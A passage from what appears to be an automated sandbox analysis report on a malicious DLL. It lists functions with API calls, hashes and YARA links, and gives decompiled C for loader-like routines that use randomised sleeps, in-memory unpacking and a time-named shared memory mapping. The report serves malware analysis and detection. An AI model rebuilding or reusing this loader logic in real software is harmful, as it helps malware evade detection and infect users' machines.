				L27:
				return _v20;
			}




























    0x6d501f31
    0x6d501f3a
    0x6d501f3f
    0x6d501f45
    0x6d501f4e
    0x6d501f54
    0x6d501f56
    0x6d501f59
    0x6d501f5e
    0x6d501f65
    0x6d501f65
    0x6d501f69
    0x6d501f71
    0x6d501f74
    0x00000000
    0x00000000
    0x6d501f7a
    0x6d501f84
    0x6d501f86
    0x6d501f89
    0x6d501f8c
    0x6d501f90
    0x6d501f98
    0x6d501f9a
    0x6d501f9d
    0x6d502005
    0x6d502005
    0x6d502009
    0x00000000
    0x00000000
    0x6d501fa2
    0x6d501fa8
    0x6d501faa
    0x6d501fbd
    0x6d501fc0
    0x6d501fc0
    0x6d501fc0
    0x6d501fc4
    0x6d501fac
    0x6d501fac
    0x6d501fb4
    0x6d501fb6
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x6d501fb6
    0x6d501fa4
    0x6d501fa4
    0x6d501fb8
    0x6d501fb8
    0x6d501fb8
    0x6d501fc7
    0x6d501fca
    0x6d501fcc
    0x6d501fd3
    0x6d501fce
    0x6d501fce
    0x6d501fce
    0x6d501fdb
    0x6d501fe1
    0x6d501fe3
    0x6d502013
    0x6d501fe5
    0x6d501fe5
    0x6d501fe8
    0x6d501fea
    0x6d501ff2
    0x6d501ff2
    0x6d501ff7
    0x6d501ff9
    0x6d502000
    0x6d502002
    0x6d502002
    0x6d502002
    0x00000000
    0x6d502002
    0x00000000
    0x6d501fe3
    0x6d501f92
    0x6d501f94
    0x6d501f96
    0x00000000
    0x00000000
    0x6d501f96
    0x6d502016
    0x6d502016
    0x6d50201d
    0x6d502022
    0x00000000
    0x00000000
    0x6d502028
    0x6d502033
    0x00000000
    0x6d502033
    0x6d50202a
    0x6d50202a
    0x6d502030
    0x00000000
    0x6d502030
    0x6d501f5e
    0x6d502034
    0x6d502039

    APIs
    • LoadLibraryA.KERNEL32(?,?,00000000,?,?), ref: 6D501F69
    • GetProcAddress.KERNEL32(?,00000000), ref: 6D501FDB
    Memory Dump Source
    • Source File: 00000003.00000002.979678689.000000006D501000.00000020.00020000.sdmp, Offset: 6D500000, based on PE: true
    • Associated: 00000003.00000002.979661998.000000006D500000.00000002.00020000.sdmp Download File
    • Associated: 00000003.00000002.979687462.000000006D503000.00000002.00020000.sdmp Download File
    • Associated: 00000003.00000002.979694688.000000006D505000.00000004.00020000.sdmp Download File
    • Associated: 00000003.00000002.979710009.000000006D506000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: AddressLibraryLoadProc
    • String ID:
    • API String ID: 2574300362-0
    • Opcode ID: 523d0a3d99767eee5dfb67e63d2b88d52d720afab7cdf6daf684b4627e12aca9
    • Instruction ID: 4dd5c2f33b1216ef5d7670f53b13f37e6e6d5513c01f1c96828898e212bba974
    • Opcode Fuzzy Hash: 523d0a3d99767eee5dfb67e63d2b88d52d720afab7cdf6daf684b4627e12aca9
    • Instruction Fuzzy Hash: B0313971A00206DFEB18CF59C890BAEB7F8BF49349F14846DD811E7640E770DA40CB62
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D533369, Relevance: 35.3, APIs: 19, Strings: 1, Instructions: 339COMMON
    Download Yara Rule
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.979745369.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: Name::operator+$NameName::$Decorator::getName::operator|=ReturnTypeoperator+
    • String ID: )
    • API String ID: 1186856153-2427484129
    • Opcode ID: 95b9c0c6bca592ac2cc2ce73661b1f262897f743e159b3a289398929614c8b63
    • Instruction ID: 0a46b694307bdde9d70251d1ec3da140f7585d3de15aa9ade43b9ee7ea2fd84f
    • Opcode Fuzzy Hash: 95b9c0c6bca592ac2cc2ce73661b1f262897f743e159b3a289398929614c8b63
    • Instruction Fuzzy Hash: 2FC16271914329AFDF0DCFA8D894EEE7BB4EB45304F02445AE215A7A90FB74AA44CB50
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D534634, Relevance: 19.8, APIs: 13, Instructions: 301COMMON
    Download Yara Rule
    APIs
    • DName::operator+.LIBCMT ref: 6D53469F
    • DName::operator+.LIBCMT ref: 6D5347D5
      • Part of subcall function 6D530565: shared_ptr.LIBCMT ref: 6D530581
    • DName::operator+.LIBCMT ref: 6D534821
    • DName::operator+.LIBCMT ref: 6D534830
    • DName::operator+.LIBCMT ref: 6D53478B
      • Part of subcall function 6D535D7E: DName::operator=.LIBVCRUNTIME ref: 6D535E0D
    • DName::operator+.LIBCMT ref: 6D53495D
    • DName::operator=.LIBVCRUNTIME ref: 6D53499D
    • DName::DName.LIBVCRUNTIME ref: 6D5349B5
    • DName::operator+.LIBCMT ref: 6D5349C4
    • DName::operator+.LIBCMT ref: 6D5349D0
      • Part of subcall function 6D535D7E: Replicator::operator[].LIBVCRUNTIME ref: 6D535DBB
    Memory Dump Source
    • Source File: 00000003.00000002.979745369.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: Name::operator+$Name::operator=$NameName::Replicator::operator[]shared_ptr
    • String ID:
    • API String ID: 1026175760-0
    • Opcode ID: b50c6b22b40f99e4cb8c62ad6b4adbc10181859d390de2fe726db57e0c74b7aa
    • Instruction ID: fbed14f6f2f0e4c33fc141a08a53d55c2028dd7eeda2cc458f26bb3f06c34589
    • Opcode Fuzzy Hash: b50c6b22b40f99e4cb8c62ad6b4adbc10181859d390de2fe726db57e0c74b7aa
    • Instruction Fuzzy Hash: B5C182719043259FDF18CFA8D854BEEBBF4AB4A304F02485EE149A7A80FB759A44CF50
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D54C9FC, Relevance: 19.6, APIs: 13, Instructions: 113COMMON
    Download Yara Rule
    APIs
    • ___free_lconv_mon.LIBCMT ref: 6D54CA40
      • Part of subcall function 6D54D278: _free.LIBCMT ref: 6D54D295
      • Part of subcall function 6D54D278: _free.LIBCMT ref: 6D54D2A7
      • Part of subcall function 6D54D278: _free.LIBCMT ref: 6D54D2B9
      • Part of subcall function 6D54D278: _free.LIBCMT ref: 6D54D2CB
      • Part of subcall function 6D54D278: _free.LIBCMT ref: 6D54D2DD
      • Part of subcall function 6D54D278: _free.LIBCMT ref: 6D54D2EF
      • Part of subcall function 6D54D278: _free.LIBCMT ref: 6D54D301
      • Part of subcall function 6D54D278: _free.LIBCMT ref: 6D54D313
      • Part of subcall function 6D54D278: _free.LIBCMT ref: 6D54D325
      • Part of subcall function 6D54D278: _free.LIBCMT ref: 6D54D337
      • Part of subcall function 6D54D278: _free.LIBCMT ref: 6D54D349
      • Part of subcall function 6D54D278: _free.LIBCMT ref: 6D54D35B
      • Part of subcall function 6D54D278: _free.LIBCMT ref: 6D54D36D
    • _free.LIBCMT ref: 6D54CA35
      • Part of subcall function 6D545D93: HeapFree.KERNEL32(00000000,00000000,?,6D538848,?,?,?,6D52E166,?,?,?,6D529FF1,?), ref: 6D545DA9
      • Part of subcall function 6D545D93: GetLastError.KERNEL32(?,?,6D538848,?,?,?,6D52E166,?,?,?,6D529FF1,?), ref: 6D545DBB
    • _free.LIBCMT ref: 6D54CA57
    • _free.LIBCMT ref: 6D54CA6C
    • _free.LIBCMT ref: 6D54CA77
    • _free.LIBCMT ref: 6D54CA99
    • _free.LIBCMT ref: 6D54CAAC
    • _free.LIBCMT ref: 6D54CABA
    • _free.LIBCMT ref: 6D54CAC5
    • _free.LIBCMT ref: 6D54CAFD
    • _free.LIBCMT ref: 6D54CB04
    • _free.LIBCMT ref: 6D54CB21
    • _free.LIBCMT ref: 6D54CB39
    Memory Dump Source
    • Source File: 00000003.00000002.979745369.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
    • String ID:
    • API String ID: 161543041-0
    • Opcode ID: 8039dcae9693818dd6c828f4c140f81013b177681e622510f3e7a09b8f8e7157
    • Instruction ID: 21733c97084e518ad1d6756651efea1ee20c4a6a157641ffac36630447c3304e
    • Opcode Fuzzy Hash: 8039dcae9693818dd6c828f4c140f81013b177681e622510f3e7a09b8f8e7157
    • Instruction Fuzzy Hash: C13173316083429FEB299B79D844B7673E9EF80314F11C829E16AD7960DF30EE54DB12
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D52EEBB, Relevance: 17.8, APIs: 7, Strings: 3, Instructions: 308COMMON
    Download Yara Rule
    APIs
    • IsInExceptionSpec.LIBVCRUNTIME ref: 6D52EFB6
    • type_info::operator==.LIBVCRUNTIME ref: 6D52EFDD
    • ___TypeMatch.LIBVCRUNTIME ref: 6D52F0E9
    • CatchIt.LIBVCRUNTIME ref: 6D52F13E
    • IsInExceptionSpec.LIBVCRUNTIME ref: 6D52F1C4
    • _UnwindNestedFrames.LIBCMT ref: 6D52F24B
    • CallUnexpected.LIBVCRUNTIME ref: 6D52F266
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.979745369.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: ExceptionSpec$CallCatchFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
    • String ID: csm$csm$csm
    • API String ID: 4234981820-393685449
    • Opcode ID: f003bcf2b9f4bbc4589dc17fa03a8a48823bed9022b69609dc640a5abcbdd98c
    • Instruction ID: 55562c284af35b0015f2ab6a8fbda90b183cf6e7820b804b356f5a47f8800f2f
    • Opcode Fuzzy Hash: f003bcf2b9f4bbc4589dc17fa03a8a48823bed9022b69609dc640a5abcbdd98c
    • Instruction Fuzzy Hash: 7EC1D031C0420AEFCF0DCFA6E8819AEBBB5BF44314F51455AE811ABA81D731DA59CF91
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D535126, Relevance: 15.3, APIs: 10, Instructions: 253COMMON
    Download Yara Rule
    APIs
    • DName::operator+.LIBCMT ref: 6D5351F2
    • UnDecorator::getSignedDimension.LIBCMT ref: 6D5351FD
    • DName::DName.LIBVCRUNTIME ref: 6D53520E
    • UnDecorator::getSignedDimension.LIBCMT ref: 6D5352B3
    • UnDecorator::getSignedDimension.LIBCMT ref: 6D5352D0
    • UnDecorator::getSignedDimension.LIBCMT ref: 6D5352ED
    • DName::operator+.LIBCMT ref: 6D535302
    • UnDecorator::getSignedDimension.LIBCMT ref: 6D535325
    • swprintf.LIBCMT ref: 6D535396
    • DName::operator+.LIBCMT ref: 6D5353ED
      • Part of subcall function 6D53327D: DName::DName.LIBVCRUNTIME ref: 6D5332A1
    Memory Dump Source
    • Source File: 00000003.00000002.979745369.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: Decorator::getDimensionSigned$Name::operator+$NameName::$swprintf
    • String ID:
    • API String ID: 3689813335-0
    • Opcode ID: 1d2282f7a806f64287548f30fa6f9cdcc2452110c02c403de21b20ce656e0d10
    • Instruction ID: 2696ec891d1958cc526c276b4bf5b37881bf817fcf48c6143c4ee3d5e2e1aac9
    • Opcode Fuzzy Hash: 1d2282f7a806f64287548f30fa6f9cdcc2452110c02c403de21b20ce656e0d10
    • Instruction Fuzzy Hash: D781F572D5432A9AEF0DCBA4C845BFE7778AF46305F53541AD210A3C80FB789A04CBA1
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D5017A7, Relevance: 15.1, APIs: 10, Instructions: 103threadsleepsynchronizationCOMMON
    Download Yara Rule
    C-Code - Quality: 80%
    			E6D5017A7(intOrPtr _a4) {
				char _v28;
				struct _SYSTEMTIME _v44;
				char _v48;
				long _v52;
				long _v56;
				void* __edi;
				long _t21;
				int _t23;
				long _t27;
				long _t31;
				intOrPtr _t39;
				intOrPtr _t44;
				signed int _t45;
				void* _t50;
				signed int _t54;
				void* _t56;
				intOrPtr* _t57;

				_t21 = E6D50146C();
				_v52 = _t21;
				if(_t21 != 0) {
					L18:
					return _t21;
				} else {
					goto L1;
				}
				do {
					L1:
					GetSystemTime( &_v44);
					_t23 = SwitchToThread();
					asm("cdq");
					_t45 = 9;
					_t54 = _t23 + (_v44.wMilliseconds & 0x0000ffff) % _t45;
					_v56 = E6D5015A3(0, _t54);
					Sleep(_t54 << 5);
					_t21 = _v56;
				} while (_t21 == 0xc);
				if(_t21 != 0) {
					goto L18;
				}
				_t27 = E6D501C12(_t45);
				_v52 = _t27;
				if(_t27 != 0) {
					L16:
					_t21 = _v52;
					if(_t21 == 0xffffffff) {
						_t21 = GetLastError();
					}
					goto L18;
				}
				if(_a4 != 0) {
					L11:
					_push(0);
					_t56 = E6D501CA4(E6D5016EC,  &_v28);
					if(_t56 == 0) {
						_v56 = GetLastError();
					} else {
						_t31 = WaitForSingleObject(_t56, 0xffffffff);
						_v56 = _t31;
						if(_t31 == 0) {
							GetExitCodeThread(_t56,  &_v56);
						}
						CloseHandle(_t56);
					}
					goto L16;
				}
				if(E6D501D7C(_t45,  &_v48) != 0) {
					 *0x6d5041b8 = 0;
					goto L11;
				}
				_t44 = _v48;
				_t57 = __imp__GetLongPathNameW;
				_t50 =  *_t57(_t44, 0, 0);
				if(_t50 == 0) {
					L9:
					 *0x6d5041b8 = _t44;
					goto L11;
				}
				_t15 = _t50 + 2; // 0x2
				_t39 = E6D501C8F(_t50 + _t15);
				 *0x6d5041b8 = _t39;
				if(_t39 == 0) {
					goto L9;
				} else {
					 *_t57(_t44, _t39, _t50);
					E6D50136A(_t44);
					goto L11;
				}
			}




















    0x6d5017b3
    0x6d5017bc
    0x6d5017c0
    0x6d5018c8
    0x6d5018ce
    0x00000000
    0x00000000
    0x00000000
    0x6d5017c6
    0x6d5017c6
    0x6d5017cb
    0x6d5017d1
    0x6d5017e0
    0x6d5017e1
    0x6d5017e4
    0x6d5017f0
    0x6d5017f4
    0x6d5017fa
    0x6d5017fe
    0x6d501805
    0x00000000
    0x00000000
    0x6d50180b
    0x6d501812
    0x6d501816
    0x6d5018b9
    0x6d5018b9
    0x6d5018c0
    0x6d5018c2
    0x6d5018c2
    0x00000000
    0x6d5018c0
    0x6d50181f
    0x6d501872
    0x6d501872
    0x6d501883
    0x6d501887
    0x6d5018b5
    0x6d501889
    0x6d50188c
    0x6d501894
    0x6d501898
    0x6d5018a0
    0x6d5018a0
    0x6d5018a7
    0x6d5018a7
    0x00000000
    0x6d501887
    0x6d50182d
    0x6d50186c
    0x00000000
    0x6d50186c
    0x6d50182f
    0x6d501833
    0x6d50183e
    0x6d501842
    0x6d501864
    0x6d501864
    0x00000000
    0x6d501864
    0x6d501844
    0x6d501849
    0x6d501850
    0x6d501855
    0x00000000
    0x6d501857
    0x6d50185a
    0x6d50185d
    0x00000000
    0x6d50185d

    APIs
      • Part of subcall function 6D50146C: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,6D5017B8,73B763F0,00000000), ref: 6D50147B
      • Part of subcall function 6D50146C: GetVersion.KERNEL32 ref: 6D50148A
      • Part of subcall function 6D50146C: GetCurrentProcessId.KERNEL32 ref: 6D501499
      • Part of subcall function 6D50146C: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 6D5014B2
    • GetSystemTime.KERNEL32(?,73B763F0,00000000), ref: 6D5017CB
    • SwitchToThread.KERNEL32 ref: 6D5017D1
      • Part of subcall function 6D5015A3: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,?,?,00000000,00000000), ref: 6D5015F9
      • Part of subcall function 6D5015A3: memcpy.NTDLL(?,?,00000000,?,?,00000000,00000000,?,?,?,?,?,?,?,?,6D5017EC), ref: 6D50168B
      • Part of subcall function 6D5015A3: VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000,00000000), ref: 6D5016A6
    • Sleep.KERNEL32(00000000,00000000), ref: 6D5017F4
    • GetLongPathNameW.KERNEL32 ref: 6D50183C
    • GetLongPathNameW.KERNEL32 ref: 6D50185A
    • WaitForSingleObject.KERNEL32(00000000,000000FF,6D5016EC,?,00000000), ref: 6D50188C
    • GetExitCodeThread.KERNEL32(00000000,?), ref: 6D5018A0
    • CloseHandle.KERNEL32(00000000), ref: 6D5018A7
    • GetLastError.KERNEL32(6D5016EC,?,00000000), ref: 6D5018AF
    • GetLastError.KERNEL32 ref: 6D5018C2
    Memory Dump Source
    • Source File: 00000003.00000002.979678689.000000006D501000.00000020.00020000.sdmp, Offset: 6D500000, based on PE: true
    • Associated: 00000003.00000002.979661998.000000006D500000.00000002.00020000.sdmp Download File
    • Associated: 00000003.00000002.979687462.000000006D503000.00000002.00020000.sdmp Download File
    • Associated: 00000003.00000002.979694688.000000006D505000.00000004.00020000.sdmp Download File
    • Associated: 00000003.00000002.979710009.000000006D506000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: ErrorLastLongNamePathProcessThreadVirtual$AllocCloseCodeCreateCurrentEventExitFreeHandleObjectOpenSingleSleepSwitchSystemTimeVersionWaitmemcpy
    • String ID:
    • API String ID: 2280543912-0
    • Opcode ID: 878600212151b24b2e937eaf7151ffc2e9081d882827c2898f56ca57d94135e4
    • Instruction ID: a90ba468fa551f13a5fb4f3c1d8de73baff73fd19cb43b3aefe5f46c5ff6a1ca
    • Opcode Fuzzy Hash: 878600212151b24b2e937eaf7151ffc2e9081d882827c2898f56ca57d94135e4
    • Instruction Fuzzy Hash: 5E3181718097129BEB14DF658884E6B77FCFFC6759B164E2AF564D2940E730CA008BA3
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D543327, Relevance: 15.1, APIs: 10, Instructions: 69COMMON
    Download Yara Rule
    APIs
    • _free.LIBCMT ref: 6D54333D
      • Part of subcall function 6D545D93: HeapFree.KERNEL32(00000000,00000000,?,6D538848,?,?,?,6D52E166,?,?,?,6D529FF1,?), ref: 6D545DA9
      • Part of subcall function 6D545D93: GetLastError.KERNEL32(?,?,6D538848,?,?,?,6D52E166,?,?,?,6D529FF1,?), ref: 6D545DBB
    • _free.LIBCMT ref: 6D543349
    • _free.LIBCMT ref: 6D543354
    • _free.LIBCMT ref: 6D54335F
    • _free.LIBCMT ref: 6D54336A
    • _free.LIBCMT ref: 6D543375
    • _free.LIBCMT ref: 6D543380
    • _free.LIBCMT ref: 6D54338B
    • _free.LIBCMT ref: 6D543396
    • _free.LIBCMT ref: 6D5433A4
    Memory Dump Source
    • Source File: 00000003.00000002.979745369.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: _free$ErrorFreeHeapLast
    • String ID:
    • API String ID: 776569668-0
    • Opcode ID: 0159f860ccebc049c4f6d727cdc37a844c96bea9f15a99d3fdaae25fade470ac
    • Instruction ID: a2543751cda50278a5c475b45aa46b3a1f3ea1b69e52c9f9049b6b34d34669f3
    • Opcode Fuzzy Hash: 0159f860ccebc049c4f6d727cdc37a844c96bea9f15a99d3fdaae25fade470ac
    • Instruction Fuzzy Hash: 8D21B676908108BFCB45DF94C884DEE7BB9AF48344F0185A6E6169B530EB71EB44DB81
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D542126, Relevance: 14.5, APIs: 1, Strings: 7, Instructions: 496COMMON
    Download Yara Rule
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.979745369.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: __aulldvrm
    • String ID: :$f$f$f$p$p$p
    • API String ID: 1302938615-1434680307
    • Opcode ID: b5438043afe30b06477190cf8c945b05878d2e90a1c38a98da154d21764c978b
    • Instruction ID: 42a05122d70d77dc55051bbde9d8cb4f87b0f4742a657b8a175e59242a351e66
    • Opcode Fuzzy Hash: b5438043afe30b06477190cf8c945b05878d2e90a1c38a98da154d21764c978b
    • Instruction Fuzzy Hash: FC026075A042298AEB38CFA5C8546DDB7B6FF42B14FA0C655D428FBA84D7708D84CB13
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D501979, Relevance: 13.6, APIs: 9, Instructions: 81filetimeCOMMON
    Download Yara Rule
    C-Code - Quality: 68%
    			E6D501979(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
				intOrPtr _v12;
				struct _FILETIME* _v16;
				short _v60;
				struct _FILETIME* _t14;
				intOrPtr _t15;
				long _t18;
				void* _t22;
				intOrPtr _t31;
				long _t32;
				void* _t34;

				_t31 = __edx;
				_t14 =  &_v16;
				GetSystemTimeAsFileTime(_t14);
				_push(0x192);
				_push(0x54d38000);
				_push(_v12);
				_push(_v16);
				L6D502210();
				_push(_t14);
				_v16 = _t14;
				_t15 =  *0x6d5041d0;
				_push(_t15 + 0x6d50505e);
				_push(_t15 + 0x6d505054);
				_push(0x16);
				_push( &_v60);
				_v12 = _t31;
				L6D50220A();
				_t18 = _a4;
				if(_t18 == 0) {
					_t18 = 0x1000;
				}
				_t34 = CreateFileMappingW(0xffffffff, 0x6d5041c0, 4, 0, _t18,  &_v60);
				if(_t34 == 0) {
					_t32 = GetLastError();
				} else {
					if(_a4 != 0 || GetLastError() == 0xb7) {
						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0);
						if(_t22 == 0) {
							_t32 = GetLastError();
							if(_t32 != 0) {
								goto L9;
							}
						} else {
							 *_a8 = _t34;
							 *_a12 = _t22;
							_t32 = 0;
						}
					} else {
						_t32 = 2;
						L9:
						CloseHandle(_t34);
					}
				}
				return _t32;
			}













    0x6d501979
    0x6d501982
    0x6d501986
    0x6d50198c
    0x6d501991
    0x6d501996
    0x6d501999
    0x6d50199c
    0x6d5019a1
    0x6d5019a2
    0x6d5019a5
    0x6d5019b0
    0x6d5019b7
    0x6d5019bb
    0x6d5019bd
    0x6d5019be
    0x6d5019c1
    0x6d5019c6
    0x6d5019d0
    0x6d5019d2
    0x6d5019d2
    0x6d5019ec
    0x6d5019f0
    0x6d501a40
    0x6d5019f2
    0x6d5019fb
    0x6d501a11
    0x6d501a19
    0x6d501a2b
    0x6d501a2f
    0x00000000
    0x00000000
    0x6d501a1b
    0x6d501a1e
    0x6d501a23
    0x6d501a25
    0x6d501a25
    0x6d501a06
    0x6d501a08
    0x6d501a31
    0x6d501a32
    0x6d501a32
    0x6d5019fb
    0x6d501a48

    APIs
    • GetSystemTimeAsFileTime.KERNEL32(?,00000002,00000000,?,?,?,?,?,?,?,?,?,6D50176E,0000000A,?,?), ref: 6D501986
    • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 6D50199C
    • _snwprintf.NTDLL ref: 6D5019C1
    • CreateFileMappingW.KERNEL32(000000FF,6D5041C0,00000004,00000000,?,?), ref: 6D5019E6
    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6D50176E,0000000A,?), ref: 6D5019FD
    • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000), ref: 6D501A11
    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6D50176E,0000000A,?), ref: 6D501A29
    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6D50176E,0000000A), ref: 6D501A32
    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6D50176E,0000000A,?), ref: 6D501A3A
    Memory Dump Source
    • Source File: 00000003.00000002.979678689.000000006D501000.00000020.00020000.sdmp, Offset: 6D500000, based on PE: true
    • Associated: 00000003.00000002.979661998.000000006D500000.00000002.00020000.sdmp Download File
    • Associated: 00000003.00000002.979687462.000000006D503000.00000002.00020000.sdmp Download File
    • Associated: 00000003.00000002.979694688.000000006D505000.00000004.00020000.sdmp Download File
    • Associated: 00000003.00000002.979710009.000000006D506000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
    • String ID:
    • API String ID: 1724014008-0
    • Opcode ID: eca2ba0c1dd296400f9d68847556c0f512a64476e0668771430c5ece3bb0ca80
    • Instruction ID: ab079f7893413d372e4f7cff42b988109628a2fe1d8d99388dc526d70c074c89
    • Opcode Fuzzy Hash: eca2ba0c1dd296400f9d68847556c0f512a64476e0668771430c5ece3bb0ca80
    • Instruction Fuzzy Hash: 6C21B0B2500109FFEF15AFA8CC84FAE77BCEB49359F118429FA11D7940D73099418BA1
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D545FA0, Relevance: 12.7, APIs: 6, Strings: 1, Instructions: 431COMMON
    Download Yara Rule
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.979745369.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: _free
    • String ID: *?
    • API String ID: 269201875-2564092906
    • Opcode ID: 17fce2d0229bb16b0366a55caf400d992325c04725859126cb095ce1f33e8906
    • Instruction ID: b0148fd6d870f852d17cd6a71daf098ccb32e60f49ea483b7a5fc2cd467fb2ec
    • Opcode Fuzzy Hash: 17fce2d0229bb16b0366a55caf400d992325c04725859126cb095ce1f33e8906
    • Instruction Fuzzy Hash: FBE13B75E0421A9FCB18CFA8C8809EEFBF5EF88314B15856AD915E7740E731AE418B91
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D545130, Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 285COMMON
    Download Yara Rule
    APIs
      • Part of subcall function 6D5435B9: GetLastError.KERNEL32(?,?,?,6D550F08,?,00000001,6D54A405,?,6D5513D8,00000001,?,?,?,6D54A1AC,?,?), ref: 6D5435BE
      • Part of subcall function 6D5435B9: SetLastError.KERNEL32(00000000,6D5740F0,000000FF,?,6D5513D8,00000001,?,?,?,6D54A1AC,?,?,?,6D572358,0000002C,6D54A405), ref: 6D54365C
    • _free.LIBCMT ref: 6D54543D
    • _free.LIBCMT ref: 6D545456
    • _free.LIBCMT ref: 6D545494
    • _free.LIBCMT ref: 6D54549D
    • _free.LIBCMT ref: 6D5454A9
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.979745369.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: _free$ErrorLast
    • String ID: C
    • API String ID: 3291180501-1037565863
    • Opcode ID: be1bed58258b06fb7847166b4753fb834d20d489f78662fcd06f3d87824dda0a
    • Instruction ID: 221bbbe7e6ddbc3bada16b3dcbc9113a2cecc7408e0312fcb30422995fd90e62
    • Opcode Fuzzy Hash: be1bed58258b06fb7847166b4753fb834d20d489f78662fcd06f3d87824dda0a
    • Instruction Fuzzy Hash: 57C1707590521A9FDB28DF18C884BADB7B4FF49304F1189EAE909A7750D770AE90CF41
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D531907, Relevance: 10.7, APIs: 7, Instructions: 151COMMON
    Download Yara Rule
    APIs
    • DName::operator+.LIBCMT ref: 6D531995
    • DName::operator+.LIBCMT ref: 6D5319E8
      • Part of subcall function 6D530565: shared_ptr.LIBCMT ref: 6D530581
      • Part of subcall function 6D530454: DName::operator+.LIBCMT ref: 6D530475
    • DName::operator+.LIBCMT ref: 6D5319D9
    • DName::operator+.LIBCMT ref: 6D531A39
    • DName::operator+.LIBCMT ref: 6D531A46
    • DName::operator+.LIBCMT ref: 6D531A8D
    • DName::operator+.LIBCMT ref: 6D531A9A
    Memory Dump Source
    • Source File: 00000003.00000002.979745369.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: Name::operator+$shared_ptr
    • String ID:
    • API String ID: 1037112749-0
    • Opcode ID: 9a087e37e0bfca6890f4cc414914e379350d638e5bf870062fb18dfd7ada2a01
    • Instruction ID: 8cc7a12e431c3729dda3184b6bb2bc2c53b86a3efcb060568d8263b3794ea76b
    • Opcode Fuzzy Hash: 9a087e37e0bfca6890f4cc414914e379350d638e5bf870062fb18dfd7ada2a01
    • Instruction Fuzzy Hash: BF515471904328ABDF0DCFA4D855EEEBBB8EF48714F02445AE605A7580FB709A44CBA0
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D532C25, Relevance: 10.6, APIs: 7, Instructions: 102COMMON
    Download Yara Rule
    APIs
    • DName::DName.LIBVCRUNTIME ref: 6D532C4D
    • DName::DName.LIBVCRUNTIME ref: 6D532C7A
      • Part of subcall function 6D530206: __aulldvrm.LIBCMT ref: 6D530237
    • DName::operator+.LIBCMT ref: 6D532C95
    • DName::DName.LIBVCRUNTIME ref: 6D532CB2
    • DName::DName.LIBVCRUNTIME ref: 6D532CE2
    • DName::DName.LIBVCRUNTIME ref: 6D532CEC
    • DName::DName.LIBVCRUNTIME ref: 6D532D13
    Memory Dump Source
    • Source File: 00000003.00000002.979745369.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: NameName::$Name::operator+__aulldvrm
    • String ID:
    • API String ID: 4069495278-0
    • Opcode ID: 8707af7dae6e8821557766ac76da23fc36a2eb545428e39cf8dc35e19cea8b8a
    • Instruction ID: ddad8e9ba5f29ef7ed9f30353ac7c258c373e38ac6fb69f01fdd0d6216ed0fe4
    • Opcode Fuzzy Hash: 8707af7dae6e8821557766ac76da23fc36a2eb545428e39cf8dc35e19cea8b8a
    • Instruction Fuzzy Hash: 4D31E471848628AACF1DCFADC890BED7BB4FF46314F128849E151A7980F7709946CB90
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D546CFC, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 83COMMON
    Download Yara Rule
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.979745369.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID:
    • String ID: C:\Windows\SysWOW64\rundll32.exe$nTm
    • API String ID: 0-2966304076
    • Opcode ID: d16b22704e32908585154936289f42a6f5907071d5888218b490c501db2d55d3
    • Instruction ID: 4dd8a12ea6d2bd152bb2ee82b1c6aa1c2ae69237d60635b04c6d44a03256f2f7
